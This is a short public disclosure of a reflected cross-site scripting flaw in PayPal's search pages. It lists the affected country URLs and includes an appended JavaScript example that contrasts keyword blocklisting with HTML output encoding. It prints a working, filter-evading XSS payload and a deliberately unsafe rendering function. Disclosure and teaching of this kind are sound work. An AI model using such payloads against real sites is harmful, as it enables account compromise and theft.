The sitewide search functionality in PayPal suffers from a cross site scripting vulnerability.
ae6f81d653037a6970d54135bf3aa3926b4d02177b5fea9343cd38d0f832748a
Hello, I saw the report about the PayPal XSS vulnerability and researched it further.
I found out that 13 more countries are affected by this XSS attack.
https://www.paypal.com/ch/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/nl/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/be/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/jp/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/cn/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/fr/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ca/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/es/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/uk/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/pl/cgi-bin/webscr?cmd=_sitewide-search
XSS Payload: <img src="x:gif" onerror="window['al\u0065rt'](/XSS by Un0wn_X/)"></img>
Image: http://www.anony.ws/i/2013/05/26/NTuWS.png
I reported them and I did not get any reply. Please make them aware of this vulnerability. I am giving this out for awareness.
Researcher: Un0wn_X
Email: unonwsec@gmail.com
Follow @UnownSec
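
Added example, not part of the original advisory and not PayPal's code: a sketch of why the published payload passes a keyword blocklist (it spells "alert" with a \u0065 escape) while HTML output encoding neutralises it. It assumes the search term is reflected into an HTML text context; all function names are hypothetical.

```javascript
// Payload string as published in the advisory above. "\\u0065" keeps the
// backslash sequence literal, as it would arrive in a request parameter.
const payload =
  '<img src="x:gif" onerror="window[\'al\\u0065rt\'](/XSS by Un0wn_X/)"></img>';

// Weak control (hypothetical): reject input containing blocklisted keywords.
// The escape sequence means the literal word "alert" never appears.
function blocklistAllows(term) {
  return !/alert|<script/i.test(term);
}

// Vulnerable pattern (assumed): search term concatenated into markup unencoded.
function renderUnsafe(term) {
  return '<p>Results for: ' + term + '</p>';
}

// Corrected pattern: encode the HTML-significant characters on output.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}
function renderSafe(term) {
  return '<p>Results for: ' + escapeHtml(term) + '</p>';
}

// Review helper: does the rendered HTML still contain a tag with an
// inline event handler that a browser would parse as markup?
function hasInlineHandlerTag(html) {
  return /<[a-z][^>]*\bon[a-z]+\s*=/i.test(html);
}

console.log('blocklist allows payload:', blocklistAllows(payload));
console.log('unsafe output has handler tag:', hasInlineHandlerTag(renderUnsafe(payload)));
console.log('safe output has handler tag:', hasInlineHandlerTag(renderSafe(payload)));
console.log(renderSafe(payload));
```

Encoding at the point of output is the control that holds here; in attribute, URL or script contexts a context-specific encoder is needed instead of this text-context one.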